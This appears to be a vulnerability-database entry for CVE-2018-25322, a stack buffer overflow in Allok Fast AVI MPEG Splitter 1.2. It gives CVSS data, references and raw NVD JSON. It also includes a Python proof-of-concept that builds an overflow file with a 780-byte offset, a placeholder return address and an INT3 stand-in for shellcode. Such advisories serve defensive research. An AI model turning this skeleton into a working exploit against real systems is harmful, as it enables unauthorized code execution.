CVE-2018-25322

Description

Allok Fast AVI MPEG Splitter 1.2 contains a stack based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious license name string. Attackers can craft a payload with 780 bytes of junk data followed by structured shellcode and place it in the License Name field to trigger the overflow and execute code with application privileges.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Allok Fast AVI MPEG Splitter 1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2018-25322
# Generates a malicious payload to trigger the buffer overflow

import struct

# Payload structure based on description:
# 780 bytes of junk data + structured shellcode
# We typically need a return address overwrite between junk and shellcode.
# Assuming 780 bytes is the offset to EIP.

offset = 780
# Placeholder for a return address (e.g., JMP ESP instruction address)
# This address needs to be specific to the target application version and OS modules.
ret_addr = struct.pack('<L', 0xAAAAAAAA) 

# Simple shellcode (NOP sled + INT3 for demonstration)
# In a real scenario, this would be msfvenom generated shellcode
nop_sled = b"\x90" * 32
shellcode = b"\xCC" # Interrupt 3 to crash/trigger debugger

payload = b"A" * offset + ret_addr + nop_sled + shellcode

try:
    with open("exploit.txt", "wb") as f:
        f.write(payload)
    print(f"[+] Payload generated successfully. Size: {len(payload)} bytes")
    print("[+] Copy the content of 'exploit.txt' into the License Name field.")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25322
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25322
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25322/
[4] VulDB https://vuldb.com/cve/CVE-2018-25322
[5] http://www.alloksoft.com
[6] http://www.alloksoft.com/allok_vconverter.exe
[7] https://www.exploit-db.com/exploits/44341
[8] https://www.vulncheck.com/advisories/allok-fast-avi-mpeg-splitter-stack-based-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25322", "sourceIdentifier": "[email protected]", "published": "2026-05-17T13:16:43.537", "lastModified": "2026-05-18T17:29:53.643", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Allok Fast AVI MPEG Splitter 1.2 contains a stack based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious license name string. Attackers can craft a payload with 780 bytes of junk data followed by structured shellcode and place it in the License Name field to trigger the overflow and execute code with application privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "http://www.alloksoft.com", "source": "[email protected]"}, {"url": "http://www.alloksoft.com/allok_vconverter.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44341", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/allok-fast-avi-mpeg-splitter-stack-based-buffer-overflow", "source": "[email protected]"}]}}